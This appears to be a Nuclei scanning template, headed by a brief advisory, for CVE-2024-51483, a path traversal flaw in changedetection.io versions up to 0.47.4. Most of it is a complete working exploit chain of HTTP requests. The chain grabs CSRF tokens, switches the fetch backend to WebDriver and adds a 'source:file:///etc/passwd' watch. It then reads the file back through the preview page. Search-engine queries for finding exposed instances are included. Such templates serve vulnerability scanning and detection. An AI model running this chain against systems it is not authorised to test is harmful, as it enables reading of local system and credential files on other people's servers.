changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source-file-///etc/passwd` can be used to retrieve local system files, where the more traditional `file-///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
PoC代码[已公开]
id: CVE-2024-51483
info:
name: Changedetection.io <= 0.47.4 - Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source-file-///etc/passwd` can be used to retrieve local system files, where the more traditional `file-///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
reference:
- https://github.com/advisories/GHSA-cwgg-57xj-g77r
- https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/model/Watch.py#L19
- https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/processors/__init__.py#L35
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
- https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
classification:
cve-id: CVE-2024-51483
cwe-id: CWE-22
epss-score: 0.12064
epss-percentile: 0.93554
cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: changedetection
product: changedetection
shodan-query: http.title:"change detection"
fofa-query: title="change detection"
google-query: intitle:"change detection"
tags: cve,cve2024,changedetection,lfi
http:
- raw:
- |
GET /settings HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="csrf_token" value="(.*)?"'
internal: true
- raw:
- |
POST /settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save
skip-variables-check: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf2
part: body
group: 1
regex:
- 'name="csrf_token" value="(.*)?"'
internal: true
- raw:
- |
POST /form/add/quickwatch HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff
matchers:
- type: dsl
dsl:
- "status_code==302"
internal: true
- raw:
- |
GET /?{{wait_for(9)}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: uuid
part: body
group: 1
regex:
- '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
internal: true
- raw:
- |
GET /preview/{{uuid}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body,'root:x:0')"
- "contains(content_type,'text/html')"
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022013cc18dfc8274967be7d4691faeb99ef8a2384294c686302bd806c3c6a3aaf48022100e01d5eef29863fa7e77822d51a714d072c5ae12d368a7fac42fdfd2eed462a5b:922c64590222798bb761d5b6d8e72950